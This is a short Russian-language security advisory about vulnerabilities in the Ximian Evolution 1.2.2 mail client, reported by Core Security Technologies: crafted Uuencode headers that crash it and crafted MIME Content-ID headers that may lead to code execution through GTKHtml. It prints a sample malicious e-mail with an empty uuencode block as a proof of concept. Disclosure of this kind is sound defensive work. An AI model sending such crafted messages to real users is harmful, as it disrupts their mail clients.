Несколько уязвимостей обнаружено в Ximian Evolution e-mail client software. Удаленный пользователь может вызвать отказ в обслуживании, обойти проверки безопасности и может выполнять произвольные команды на целевой системе.
Core Security Technologies сообщил, что удаленный пользователь может послать специально обработанный Uuencode заголовок в электронном сообщении, чтобы аварийно завершить работу клиента при попытке прочитать это сообщение.
Также сообщается, что удаленный пользователь может послать особенно обработанный MIME Content-ID заголовок как часть MIME образа, чтобы передать произвольные данные к GTKHtml для обработки. В результате работа приложения аварийно завершиться с возможностью выполнения произвольного кода.
Пример:
>From xxx@corest.com Wed Mar 5 14:06:02 2003
Subject: xxx
From: X X. X <xxx@corest.com>
To: xxx@corest.com
Content-Type: multipart/mixed; boundary="=-mTDu5zdJIsixETTwCF5Y"
Message-Id: <1046884154.1731.5.camel@vaiolin>
Mime-Version: 1.0
Date: 05 Mar 2003 14:09:14 -0300
--=-mTDu5zdJIsixETTwCF5Y
Content-Disposition: inline; filename=name
Content-Type: application/octet-stream; name=name
Content-Transfer-Encoding: 7bit
begin 600
end
Уязвимость обнаружена в Ximian Evolution Mail User Agent 1.2.2
.